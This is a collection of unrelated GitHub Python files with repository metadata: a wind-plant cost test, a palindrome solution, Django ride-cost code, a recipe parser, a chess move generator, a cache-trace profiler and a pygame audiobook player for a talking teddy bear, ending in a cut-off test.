SubstationCost(input_dict=self.input_dict, output_dict=self.output_dict, project_name=self.project_name)\n trial_run = run_SubstationCost.run_module()\n\n\n if trial_run[0] == 0 :\n print('\\n\\n================== MODULE EXECUTION SUCCESS =========================\\n')\n print(' SubstationCost module ran successfully. See the list of inputs'\n '\\n and outputs below used by the module in its calculations:')\n print( '\\n=====================================================================\\n')\n\n\n elif trial_run[0] == 1 :\n print('\\n\\n================== MODULE EXECUTION FAILURE ==================\\n')\n print(' SubstationCost module failed to run successfully. See the list'\n '\\n of inputs below used by the module in its calculations:')\n print('\\n================================================================\\n')\n\n\n print('\\nGiven below is the set of inputs fed into SubstationCost module:\\n')\n for key, value in self.input_dict.items():\n print(key, ':', value)\n\n if trial_run[0] == 0: # Only print outputs if module ran successfully.\n print('\\nGiven below is the set of outputs calculated by the SubstationCost module:\\n')\n for key, value in self.output_dict.items():\n if isinstance(value, pd.DataFrame):\n print('\\nNow printing DataFrame ->', key, ':\\n', value)\n else:\n print(key, ':', value)","repo_name":"WISDEM/LandBOSSE","sub_path":"landbosse/tests/model/test_SubstationCost.py","file_name":"test_SubstationCost.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"51"} +{"seq_id":"33688676260","text":"class Solution:\n def validPalindrome(self, s: str) -> bool:\n n = len(s)\n sR = s[::-1]\n if s == sR:\n return True\n for i in range(n):\n if s[i] != sR[i]:\n ans1 = s[:i]+s[i+1:]\n ans2 = sR[:i]+sR[i+1:]\n if ans1 == ans1[::-1] or ans2 == ans2[::-1]:\n return True\n else:\n return False\n return True\n","repo_name":"Liuzhch1/leetcode","sub_path":"剑指Offer专项突击/字符串/p021.py","file_name":"p021.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"216191114","text":"from django.contrib.auth.models import User\nfrom django.db.models import Sum, F\n\nfrom DriveWatch.models import Ride, TankFilling\n\n\ndef get_last_tank_filling_data_summary():\n tank_filling = TankFilling.objects.filter(date__isnull=False).last()\n if tank_filling == None:\n return dict()\n\n result = dict()\n user_data = list()\n\n result[\"total_money\"] = tank_filling.money\n\n users = User.objects.all()\n\n ride_queryset = Ride.objects.filter(tank_filling=tank_filling)\n total_sum_distance = ride_queryset.aggregate(\n sum=Sum(F(\"distance\"))\n )[\"sum\"]\n total_sum_distance = total_sum_distance if total_sum_distance else 0\n\n together_sum_distance = ride_queryset.filter(user__isnull=True).aggregate(\n sum=Sum(F(\"distance\"))\n )[\"sum\"]\n together_sum_distance = together_sum_distance if together_sum_distance else 0\n\n result[\"together_distance\"] = together_sum_distance\n try:\n together_money = (together_sum_distance / total_sum_distance) * tank_filling.money\n except ZeroDivisionError:\n together_money = 0\n result[\"together_money\"] = round(together_money, 2)\n\n for user in users:\n sum_distance = ride_queryset.filter(user=user).aggregate(\n sum=Sum(F(\"distance\"))\n )[\"sum\"]\n sum_distance = sum_distance if sum_distance else 0\n\n try:\n money = (sum_distance / total_sum_distance) * tank_filling.money\n except ZeroDivisionError:\n money = 0\n\n user_data.append(\n {\n \"id\": user.id,\n \"distance\": round(sum_distance, 2),\n \"money\": round(money, 2),\n \"calculated_money\": round(money + together_money / 2, 2)\n }\n )\n result[\"user_data\"] = user_data\n return result\n","repo_name":"leonxs2001/HomeServer","sub_path":"DriveWatch/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"12231923585","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('webapollo_sso', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='UserMapping',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('apollo_user_id', models.IntegerField(unique=True)),\n ('apollo_user_name', models.CharField(max_length=100)),\n ('apollo_user_pwd', models.CharField(max_length=50)),\n ('last_date', models.DateTimeField(auto_now=True)),\n ('django_user', models.OneToOneField(null=True, blank=True, to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"childers/genomics-workspace","sub_path":"webapollo_sso/migrations/0002_usermapping.py","file_name":"0002_usermapping.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"4674454546","text":"#!/usr/bin/env python3\nimport json\nimport subprocess\n\nfrom progress.bar import Bar\nfrom progress.spinner import Spinner\n\n\ndef scrape_all_recipes():\n bar = Bar(\"Loading recipes\", max=91465)\n\n recipe_list = []\n\n with open(\"dedup.json\") as dataset:\n for i, line in enumerate(dataset.readlines()):\n data = json.loads(line)\n\n recipe_list.append(data)\n\n bar.next()\n\n bar.finish()\n\n return recipe_list\n\n\nrecipes = scrape_all_recipes()\n\n\ndef cleanUnicode(s):\n \"\"\"\n Replace unicode fractions with ascii representation\n\n '⅛' => '1/8'\n \"\"\"\n\n unicode_map = {\n # fractions\n \"⅛\": \"1/8\",\n \"⅜\": \"3/8\",\n \"⅝\": \"5/8\",\n \"⅞\": \"7/8\",\n \"⅙\": \"1/6\",\n \"⅚\": \"5/6\",\n \"⅕\": \"1/5\",\n \"⅖\": \"2/5\",\n \"⅗\": \"3/5\",\n \"⅘\": \"4/5\",\n \"¼\": \"1/4\",\n \"¾\": \"3/4\",\n \"⅓\": \"1/3\",\n \"⅔\": \"2/3\",\n \"½\": \"1/2\",\n \"™\": \"\",\n \"®\": \"\",\n \"©\": \"\",\n \"…\": \"\",\n \"’\": \"'\",\n \"‘\": \"'\",\n \"”\": '\"',\n \"“\": '\"',\n \"à\": \"a\",\n \"â\": \"a\",\n \"É\": \"E\",\n \"è\": \"e\",\n \"é\": \"e\",\n \"ñ\": \"n\",\n \"ú\": \"u\",\n }\n\n for f_unicode, f_ascii in unicode_map.items():\n s = s.replace(f_unicode, \" \" + f_ascii)\n\n return s\n\n\n# write an empty file\nf = open(\"input.txt\", \"w\")\nf.close()\n\n# recipes = recipes[:10000]\n\nbar = Bar(\"Writing input file\", max=91465)\nfor i, recipe in enumerate(recipes):\n bar.next()\n with open(\"input.txt\", \"a\") as f:\n recipe[\"ingredients\"] = [\n cleanUnicode(ingredient) for ingredient in recipe[\"ingredients\"]\n ]\n f.write(\"\\n\".join(recipe[\"ingredients\"]) + \"\\n\")\nbar.finish()\n\nprint(\"Parsing input file.\")\ncommand = subprocess.run(\n [\n \"docker\",\n \"run\",\n \"--mount\",\n \"type=bind,source=/home/wedmisten/foodFinder/input.txt,target=/input/input.txt,readonly\",\n \"wedmisten/ingredients-tagger\",\n ],\n capture_output=True,\n)\n\nprint(\"Loading parsed output.\")\ningredients = command.stdout\nparsed = json.loads(ingredients)\n\nbar = Bar(\"Removing HTML Tags\", max=222034267)\n# remove random HTML data\nfor ingedient in parsed:\n bar.next()\n del ingedient[\"display\"]\nbar.finish()\n\nbar = Bar(\"Writing enriched recipes\", max=91465)\nparsed_idx = 0\nfor i, recipe in enumerate(recipes):\n bar.next()\n recipe[\"parsed_ingredients\"] = []\n for _ in range(len(recipe[\"ingredients\"])):\n recipe[\"parsed_ingredients\"].append(parsed[parsed_idx])\n parsed_idx += 1\n\nbar.finish()\n\nprint(\"Writing enriched data\")\nwith open(\"enriched_recipes.json\", \"w\") as f:\n json.dump(recipes, f, indent=2)\n","repo_name":"wcedmisten/foodFinder","sub_path":"test-scraper.py","file_name":"test-scraper.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"51"} +{"seq_id":"39805695831","text":"\"\"\"\nAceasta clasa este responsabila sa stocheze toate informatiile actuala ale jocului de sah si sa o sa se ocupe de mutarile valide si va pastralog-ul de mutari\n\"\"\"\n\nclass GameState():\n def __init__(self):\n # tabla de sah este o lista 8X8 2d si fiecare element din lista are 2 caractere\n #primul caracter reprezinta culoarea piese, 'b' sau ' white'\n #cel de-al doilea reprezinta tipul piese care poate fi 'k'=King, 'Q'=Queen, 'R'=Rook, 'B'=Bishop, 'N'=Knight sau 'P'=Pawn\n # '--'= spatiu liber fara piese\n self.board = [\n [\"bR\", \"bN\", \"bB\", \"bQ\", \"bK\", \"bB\", \"bN\", \"bR\"],\n [\"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"--\", \"--\", \"wR\", \"--\", \"--\", \"bK\", \"--\", \"--\"],\n [\"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\", \"--\"],\n [\"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\"],\n [\"wR\", \"wN\", \"wB\", \"wQ\", \"wK\", \"wB\", \"wN\", \"wR\"],\n ]\n self.moveFunctions = {'p': self.getPawnMoves, 'R': self.getRookMoves, 'N': self.getKnightMoves,\n 'B': self.getBishopMoves, 'Q': self.getQueenMoves, 'K': self.getKingMoves}\n\n self.whiteToMove = True\n self.moveLog = []\n\n\n #Preia o mutare ca parametru si o executa ( nu va function pentru castling, pown promotion, si en-passant(capturarea pionului))\n def makeMove(self, move):\n self.board[move.startRow][move.startCol] = \"--\" #dupa ce mutam piesa lasa spatiul gol\n self.board[move.endRow][move.endCol] = move.pieceMoved\n self.moveLog.append(move) #inregistram mutarea ca sa o putem modifica ulterior daca este necesar\n self.whiteToMove = not self.whiteToMove #schimbam turele playerilor\n\n\n def undoMove(self):\n if len(self.moveLog) != 0: # ne asiguram ca este o mutare care putem face undo la ea\n move = self.moveLog.pop()\n self.board[move.startRow][move.startCol] = move.pieceMoved\n self.board[move.endRow][move.endCol] = move.pieceCaptured\n self.whiteToMove = not self.whiteToMove #facem schimb de tura inapoi\n\n '''\n Toate mutarile considerate valide\n '''\n def getValidMoves(self):\n return self.getAllPossibleMoves()\n\n '''\n Toate mutarile fara validare\n '''\n def getAllPossibleMoves(self):\n moves = []\n for r in range(len(self.board)): #numarul de randuri\n for c in range(len(self.board[r])): #numarul de coloane in randurile date\n turn = self.board[r][c][0]\n if (turn == 'w' and self.whiteToMove) or (turn == 'b' and not self.whiteToMove):\n piece = self.board[r][c][1]\n self.moveFunctions [piece](r, c, moves) #apeleaza corect functia move in baza tipului piesei\n return moves\n\n\n\n\n '''\n Preia toate mutarile pionul localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getPawnMoves(self, r, c, moves):\n if self.whiteToMove: #mutarea pionilor albi\n if self.board[r-1][c] == \"--\": #mutare de un patrat a pionului\n moves.append(Move((r, c) , (r-1, c), self.board))\n if r == 6 and self.board[r-2][c] ==\"--\": # 2 patrate mutare pion\n moves.append(Move((r, c), (r-2, c), self.board))\n if c-1 >= 0:\n if self.board[r-1][c-1][0] == 'b': #este o piesa inima de capturat\n moves.append(Move((r, c), (r - 1 , c - 1), self.board))\n if c+1 <= 7: #captureaza piesa inamica la dreapta\n if self.board[r-1][c+1][0] == 'b': # piesa inamica de capturat\n moves.append(Move((r, c),(r-1, c+1), self.board))\n\n else: #pionul negru mutari\n if self.board[r + 1][c] == \"--\": # mutare 1 patrat\n moves.append(Move((r,c), (r + 1, c), self.board))\n if r == 1 and self.board[r+2][c] == \"--\": #2 square moves\n moves.append(Move((r,c), (r + 2, c), self.board))\n # captures\n if c - 1 >= 0: #captura la stanga\n if self.board[r + 1][c - 1][0] == 'w':\n moves.append(Move((r, c), (r + 1, c - 1), self.board))\n if c + 1 <=7: #captura la dreapta\n if self.board[r+1][c+1][0] == 'w':\n moves.append(Move((r, c), (r + 1, c + 1), self.board))\n\n '''\n Preia toate mutarile turei localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getRookMoves(self, r, c, moves):\n directions = ((-1, 0), (0, -1), (1,0), (0, 1)) # sus, stanga, jos , dreapta\n enemyColor = \"b\" if self.whiteToMove else \"w\"\n for d in directions:\n for i in range(1, 8):\n endRow = r + d[0] * i\n endCol = c + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8: #pe tabla\n endPiece = self.board[endRow][endCol]\n if endPiece == \"--\": #spatiu gol valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n elif endPiece[0] == enemyColor: # enemy piece valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n break\n else: # piesa proprie rezulta invalid\n break\n else : # inafara tablei de joc\n break\n\n\n '''\n Preia toate mutarile turei localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getKnightMoves(self, r, c, moves):\n knightMoves = ((-2, -1), (-2, 1), (-1, -2), (-1, 2), (1, -2), (1, 2), (2, -1), (2, 1))\n allyColor = \"w\" if self.whiteToMove else \"b\"\n for m in knightMoves:\n endRow = r + m[0]\n endCol = c + m[1]\n if 0 <= endRow < 8 and 0 <= endCol <8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] != allyColor: #nnu este piesa aliata (spatiu gol sau piesa inamica)\n moves.append(Move((r, c), (endRow, endCol), self.board))\n\n\n '''\n Preia toate mutarile nebunului localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getBishopMoves(self, r, c, moves):\n directions = ((-1, -1), (-1, 1), (1, -1), (1, 1)) #diagonale\n enemyColor = \"b\" if self.whiteToMove else \"w\"\n for d in directions:\n for i in range(1, 8): #nebunul poate traversa doar 7 casute\n endRow = r + d[0] * i\n endCol = c + d[1] * i\n if 0 <= endRow < 8 and 0 <= endCol < 8: #daca este pe tabla\n endPiece = self.board[endRow][endCol]\n if endPiece == \"--\" : #spatiu gol valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n elif endPiece[0] == enemyColor: #enemy piece valid\n moves.append(Move((r, c), (endRow, endCol), self.board))\n break\n else: #friendly piece invalid\n break\n else: # off board\n break\n\n '''\n Preia toate mutarile reginei localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getQueenMoves(self, r, c, moves):\n self.getRookMoves(r, c, moves)\n self.getBishopMoves(r, c, moves)\n\n '''\n Preia toate mutarile regelui localizat in randul si coloana respectiva si creeaza mutari in lista\n '''\n def getKingMoves(self, r, c, moves):\n kingMoves = ((-1, 1), (-1, 0), (-1, 1), (0, -1), (0, 1 ), (1, -1), (1, 0), (1, 1))\n allyColor = \"w\" if self.whiteToMove else \"b\"\n for i in range(8):\n endRow = r + kingMoves[i][0]\n endCol = c + kingMoves[i][1]\n if 0 <= endRow < 8 and 0 <= endCol < 8:\n endPiece = self.board[endRow][endCol]\n if endPiece[0] != allyColor: #nu este o piesa aliata( spatiu gol sau piesa inamica)\n moves.append(Move((r, c), (endRow, endCol), self.board))\n\nclass Move():\n # maps key to values\n # key : value\n #Creeam notarea in sah a tablei\n ranksToRows = {\"1\": 7, \"2\": 6, \"3\": 5, \"4\": 4,\n \"5\": 3, \"6\": 2, \"7\": 1, \"8\":0}\n rowsToRanks = {v: k for k, v in ranksToRows.items()}\n filesToCols = {\"a\":0, \"b\":1, \"c\":2, \"d\": 3,\n \"e\": 4, \"f\": 5, \"g\": 6, \"h\": 7}\n colsToFiles = {v: k for k, v in filesToCols.items()}\n\n def __init__(self, startSq, endSq, board):\n self.startRow = startSq[0]\n self.startCol = startSq[1]\n self.endRow = endSq[0]\n self.endCol = endSq[1]\n self.pieceMoved = board[self.startRow][self.startCol]\n self.pieceCaptured = board[self.endRow][self.endCol]\n self.moveID = self.startRow * 1000 + self.startCol * 100 + self.endRow *10 + self.endCol\n\n\n '''\n Overriding metodele =\n '''\n def __eq__(self, other):\n if isinstance(other, Move):\n return self.moveID == other.moveID\n return False\n\n\n def getChessNotation(self):\n return self.getRankFile(self.startRow, self.startCol) + self.getRankFile(self.endRow, self.endCol)\n\n def getRankFile(self, r, c):\n return self.colsToFiles[c] + self.rowsToRanks[r]\n\n","repo_name":"tarbatoma/ChessPhyton","sub_path":"Chess/ChessEngine.py","file_name":"ChessEngine.py","file_ext":"py","file_size_in_byte":9463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"43123875394","text":"import matplotlib.pyplot as plt #Importando a biblioteca para a plotagem do gráfico\r\nimport numpy as np #Biblioteca para as funções\r\nr = 200 #Etapas = n\r\nu = 50 # Número de realizações\r\ns = np.zeros((r, u)) #Vetor com 2 atributos, onde r número de etapas e u = 50 realizações inicializando no zero\r\np= 0.75 #probabilidade\r\nn = 2\r\n# onde sample é o número de amostras\r\nfor sample in range(u): #u = 50 Comparando quais valores aleatórios são menores que p\r\n if (np.random.uniform(0, 1) < p):\r\n s[1, sample] = 1 #guardando os valores no vetor s\r\n for n in range(1, r): # de n = até r= 200 alimentar os vetores com os processos aleatórios\r\n\t s[n,sample]= s[n-1,sample] #pega o vetor com o valor atual n =2 e recebe o valor anterior para a comparação\r\n\t if (np.random.uniform(0,1) < p): # Se o valor aleatório tiver com o parâmetro menor que a probabilidade\r\n\t\t s[n,sample] = s[n-1,sample]+1 #Logo o próximo processo vai ser somado + 1 e vai contruindo o processo aleatório\r\n# Sempre comparando o atual com o anterior e guarda o próximo, assim sucessivamente\r\n\r\n#########################################################################################################################\r\n#Agora para plotar outra distribuição com os mesmos parâmetros e probabilidade k = 0.4\r\n\r\nk = 0.5\r\nv = np.zeros((r, u)) ##Vetor com 2 atributos, onde r = 200 é o número de tentativas e u = 50 realizações inicializando no zero\r\nfor sample in range(u): #Comparando quais valores aleatórios são menores que k\r\n if (np.random.uniform(0, 1) < k):\r\n v[1, sample] = 1 #guardando os valores no vetor v\r\n for n in range(1, r): # de n = até r= 200 alimentar os vetores com os processos aleatórios\r\n\t v[n,sample]= v[n-1,sample] #pega o vetor com o valor atual n =2 e recebe o valor anterior para a comparação\r\n\t if (np.random.uniform(0 ,1) < k): # Se o valor aleatório tiver com o parâmetro menor que a probabilidade\r\n\t\t v[n,sample] = v[n-1,sample]+1 #Logo o próximo processo vai ser somado + 1 e vai contruindo o processo aleatório\r\n\r\nplt.plot(s[:, sample], 'r-', label = \"prob %s\" %str(p)) #Plotando a figura com o processo bonomial aleatório\r\nplt.plot(v[:, sample], 'g-', label = \"prob %s\" %str(k)) #Plotando a figura com o processo bonomial aleatório\r\nplt.legend('')\r\nplt.title(f'Processo aleatório binomial') #Título\r\nplt.xlabel('N') #Eixo x\r\nplt.ylabel('Sn') #Eixo y\r\nplt.legend(loc=2) #Localização da legenda\r\nplt.grid(True)\r\nplt.show()","repo_name":"augustocarrlos10/Processos-aleat-rios","sub_path":"Binomial_Process.py","file_name":"Binomial_Process.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25234210625","text":"from desword.lib import FileHandler\nimport os\n\n\ndef test_file_cleaned(path_data):\n internal_directory = os.path.join(path_data.output, 'depth')\n os.mkdir(internal_directory)\n with open(os.path.join(internal_directory, \"example.md\"), \"w\") as f:\n f.write('

    Hallo

    ')\n assert os.listdir(internal_directory) == ['example.md']\n f = FileHandler(path_data)\n f.empty_output()\n assert os.listdir(path_data.output) == []\n\n\ndef test_file_graph_built(path_data):\n internal_directory = os.path.join(path_data.input, 'depth')\n os.mkdir(internal_directory)\n with open(os.path.join(internal_directory, \"example.md\"), \"w\") as f:\n f.write('# Hallo')\n f = FileHandler(path_data)\n f.empty_output()\n f.generate_file_graph()\n assert f.file_graph['depth/example']['lines'] == '# Hallo'\n","repo_name":"tomlockwood/desword","sub_path":"tests/unit_tests/test_file_handler.py","file_name":"test_file_handler.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"15613780777","text":"from boto3.session import Session\n\n\nclass SQS:\n def __init__(self, config):\n self.session = Session(aws_access_key_id=config['ACCESS_KEY'],\n aws_secret_access_key=config['SECRET_ACCESS_KEY'],\n region_name=config['REGION'])\n\n self.sqs = self.session.resource('sqs')\n self.queue = self.sqs.get_queue_by_name(QueueName=config['PRIORITY_QUEUE'])\n\n def set_queue(self, s_name):\n self.queue = self.sqs.get_queue_by_name(QueueName=s_name)\n\n return True\n\n def send_message(self, s_body, d_attributes):\n response = self.queue.send_message(MessageBody=s_body,\n MessageAttributes=d_attributes)\n\n return response\n\n def receive_message(self, l_attr_names, l_message_attr_names,\n i_max_number_of_messages,\n i_visibility_timeout,\n i_waittimeseconds):\n\n message = self.queue.receive_messages(\n l_attr_names,\n l_message_attr_names,\n i_max_number_of_messages,\n i_visibility_timeout,\n i_waittimeseconds)\n\n return message\n","repo_name":"eshleebien/falcon-boilerplate","sub_path":"util/sqs.py","file_name":"sqs.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"51"} +{"seq_id":"5354615783","text":"import json \nimport numpy as np \nimport pandas as pd \nfrom cydonia.profiler.RDHistogram import RDHistogram\n\nclass BlockAccessTraceProfiler:\n def __init__(\n self, \n block_access_trace_path: str \n ) -> None:\n self.df = pd.read_csv(block_access_trace_path, names=[\"ts\", \"id\", \"op\", \"rd\"])\n self.start_time_us = self.df.iloc[0][\"ts\"]\n self.end_time_us = self.df.iloc[-1][\"ts\"]\n self.trace_length_us = self.end_time_us - self.start_time_us \n self.rd_hist_snapshot_window_size_sec = 3600 * 24\n self.id_set = set()\n self.rd_hist = RDHistogram()\n print(\"Block trace loaded!\")\n \n\n def get_stat(self, index, wss_blocks):\n max_read_hit_rate = 0.0 \n output_stat = {}\n output_stat['index'] = index\n output_stat['wss_gb'] = (wss_blocks * 4096)/1e9\n for percent_working_set_size in range(10, 101, 10):\n cache_size = (percent_working_set_size/100)*wss_blocks\n max_read_hit_rate, read_hit_rate = self.rd_hist.get_read_hit_rate(int(cache_size))\n output_stat['hr_{}'.format(percent_working_set_size)] = read_hit_rate\n output_stat['size_{}'.format(percent_working_set_size)] = int(cache_size)\n output_stat[\"max_read_hit_rate\"] = max_read_hit_rate\n return output_stat\n\n \n def profile(self, output_path = None):\n active_window_index = 0\n window_stat_arr = []\n for row_index, row in self.df.iterrows():\n self.rd_hist.update_rd(row[\"rd\"], row[\"op\"])\n self.id_set.add(row[\"id\"])\n\n cur_time_us = row[\"ts\"]\n time_elapsed_us = (cur_time_us - self.start_time_us)/(1e6*3600)\n cur_window_index = int((cur_time_us - self.start_time_us)//(1e6*self.rd_hist_snapshot_window_size_sec))\n if row_index % 10000000 == 0 and row_index > 0:\n print(\"{}/{} processed! {}%\".format(row_index, len(self.df), 100*row_index/len(self.df)))\n\n if cur_window_index != active_window_index:\n # window changed so collect stats\n output_stat = self.get_stat(active_window_index, len(self.id_set))\n output_stat['time_elapsed_us'] = time_elapsed_us\n print(json.dumps(output_stat))\n window_stat_arr.append(output_stat)\n active_window_index = cur_window_index\n else:\n output_stat = self.get_stat(active_window_index, len(self.id_set)) \n output_stat['time_elapsed_us'] = time_elapsed_us\n print(json.dumps(output_stat))\n window_stat_arr.append(output_stat)\n active_window_index = cur_window_index\n \n\n if output_path is not None:\n with open(output_path, \"w+\") as f:\n json.dump(window_stat_arr, f, indent=4)\n ","repo_name":"pbhandar2/phdthesis","sub_path":"cydonia/cydonia/profiler/BlockAccessTraceProfiler.py","file_name":"BlockAccessTraceProfiler.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10649910330","text":"\nimport platform\nimport pygame\nfrom pygame.locals import *\nimport psycopg2\nimport time\nimport keyboard\nimport pyttsx3\n\nDirectory = \"\"\n\n# name = ['Rotkaeppchen', 'Rapunzel', 'Froschkoenig', 'Aschenputtel', 'Gestiefelter_Kater', 'Bremer_Stadtmusikanten', 'Haensel_und_Gretel', 'Goldene_Gans', 'Wilhelm_Tell']\nname = []\nautor = []\ngenre = []\npausiert = []\npygame.mixer.init()\nFilesPlayed = 0\n#conn1 = psycopg2.connect(\"dbname=paul user=Vinc password=Vinc\")\nengine = pyttsx3.init()\n\n\n\n\nclass Buecher(object):\n\n if (platform.system() == 'Windows'):\n deutsch = \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech\\Voices\\Tokens\\eSpeak_3\"\n engine.setProperty('rate', 100)\n\n Directory = \"D:/Diplomarbeit/Github/Kuscheltier/Teddy/books/Brueder_Grimm/\"\n else:\n deutsch = \"german\"\n engine.setProperty('rate', 140)\n Directory = \"/books/Brueder_Grimm/\"\n\n engine.setProperty('voice', deutsch)\n\n\n\n# Hier werden die Variablen aus dem Parameter der Klasse initialisiert\n def __init__(self, conn, sensorwerte):\n self.conn = conn\n self.sensorwerte = sensorwerte\n\n def selectBuch(self,conn):\n \n print(self.sensorwerte.rHand)\n \n cur1 = conn.cursor()\n cur2 = conn.cursor()\n cur3 = conn.cursor()\n cur4 = conn.cursor()\n\n SQLName = 'SELECT name FROM Buch WHERE ausgewaehlt = TRUE'\n SQLAutor = 'SELECT autor FROM Buch WHERE ausgewaehlt = TRUE'\n SQLGenre = 'SELECT genre FROM Buch WHERE ausgewaehlt = TRUE'\n SQLPausiert = 'SELECT pausiert FROM Buch WHERE ausgewaehlt = TRUE'\n\n cur1.execute(SQLName, )\n cur2.execute(SQLAutor, )\n cur3.execute(SQLGenre, )\n cur4.execute(SQLPausiert, )\n\n if (\n cur1.rowcount != cur2.rowcount or cur1.rowcount != cur3.rowcount or cur1.rowcount != cur4.rowcount or cur2.rowcount != cur3.rowcount or cur2.rowcount != cur4.rowcount or cur3.rowcount != cur4.rowcount):\n cur1.execute(SQLName, )\n cur2.execute(SQLAutor, )\n cur3.execute(SQLGenre, )\n cur4.execute(SQLPausiert, )\n\n row1 = cur1.fetchall()\n row2 = cur2.fetchall()\n row3 = cur3.fetchall()\n row4 = cur4.fetchall()\n\n for row in row1:\n name.append(row[0])\n for row in row2:\n autor.append(row[0])\n for row in row3:\n genre.append(row[0])\n for row in row4:\n pausiert.append(row[0])\n\n cur1.close()\n cur2.close()\n cur3.close()\n cur4.close()\n\n def stopLesen(self):\n pygame.mixer.music.pause()\n\n def startLesenAgain(self):\n pygame.mixer.music.unpause()\n\n\n def getVolume(self):\n #print(pygame.mixer.music.get_volume())\n return pygame.mixer.music.get_volume()\n\n def volumeUp(self):\n pygame.mixer.music.set_volume(self.getVolume()+0.1)\n\n def volumeDown(self):\n pygame.mixer.music.set_volume(self.getVolume()-0.1)\n\n\n def busy(self,conn,index):\n print(\"in busy\")\n cur1 = conn.cursor()\n SQL_UPDATE_Time = 'UPDATE Buch SET pausiert = (%s) WHERE name = (%s)'\n start_time = time.time()\n elapsed_time = 0\n pause = False\n warSchonPause = False\n global elapsed_pause_time\n elapsed_pause_time = 0\n global pause_start\n global pause_end\n\n zeitSeitLetztemSignal = 1\n beginnZeitSeitLetztemSignal = 0\n while pygame.mixer.music.get_busy() == True:\n\n #KeyboardSignalZeit\n\n print(\"Zeit der Pausen: \"+str(elapsed_pause_time))\n\n print(start_time)\n if pause == False and warSchonPause == False:\n elapsed_time = time.time() - start_time # + pausiert[0]\n if pause == False and warSchonPause == True:\n elapsed_time = time.time() - start_time - elapsed_pause_time\n\n zeitSeitLetztemSignal = time.time() - beginnZeitSeitLetztemSignal\n\n print(elapsed_time)\n if zeitSeitLetztemSignal>=1:\n try: # used try so that if user pressed other than the given key error will not be shown\n if self.sensorwerte.rFuss == False:\n print(self.getVolume())\n print('Lauter')\n self.volumeUp()\n print(self.getVolume())\n beginnZeitSeitLetztemSignal = time.time()\n elif self.sensorwerte.lFuss == False:\n print(self.getVolume())\n print('Leiser')\n self.volumeDown()\n print(self.getVolume())\n beginnZeitSeitLetztemSignal = time.time()\n elif self.sensorwerte.rHand == False:\n print('Pause')\n pause_start = time.time()\n pause = True\n self.stopLesen()\n beginnZeitSeitLetztemSignal = time.time()\n elif self.sensorwerte.lHand == False:\n print(\"Lese wieder\")\n elapsed_pause_time = elapsed_pause_time + time.time() - pause_start\n print(\"Elapsed Pause Time nach unpause: \"+str(elapsed_pause_time))\n pause = False\n warSchonPause = True\n self.startLesenAgain()\n beginnZeitSeitLetztemSignal = time.time()\n elif self.sensorwerte.abbr == False:\n print('Escape')\n pause_start = time.time()\n pause = True\n self.stopLesen()\n beginnZeitSeitLetztemSignal = time.time()\n\n print(pausiert[index])\n pausiert[index] = elapsed_time + pausiert[index]\n print(pausiert[index])\n data = (pausiert[index], name[index],)\n cur1.execute(SQL_UPDATE_Time, data)\n conn.commit()\n break\n\n else:\n pass\n except:\n pass # if user pressed a key other than the given key the loop will break\n #schonGesendet=True\n #continue\n print(pausiert[index])\n pausiert[index] = elapsed_time + pausiert[index]\n print(pausiert[index])\n data = (pausiert[index], name[index],)\n cur1.execute(SQL_UPDATE_Time, data)\n conn.commit()\n\n def playSong(self,index):\n #pygame.mixer.music.load(Directory+name[index]+\".mp3\")\n #pygame.mixer.music.play(1,pausiert[index])\n #busy()\n #pygame.mixer.music.load(Directory + name[index+1] + \".mp3\")\n #pygame.mixer.music.play(1, pausiert[index+1])\n #busy()\n print(name)\n\n #skip = False\n\n for x in range(index,len(name)):\n\n for y in range(1):\n engine.say(\"Wollen sie das Hörbuch\" + str(name[x]) + \"hören?\")\n engine.runAndWait()\n\n time5 = time.time()+5\n while time.time() len(data)-1\n assert c_data.index[0] == 0\n assert c_data.index[-1] == len(c_data)-1\n\n\ndef 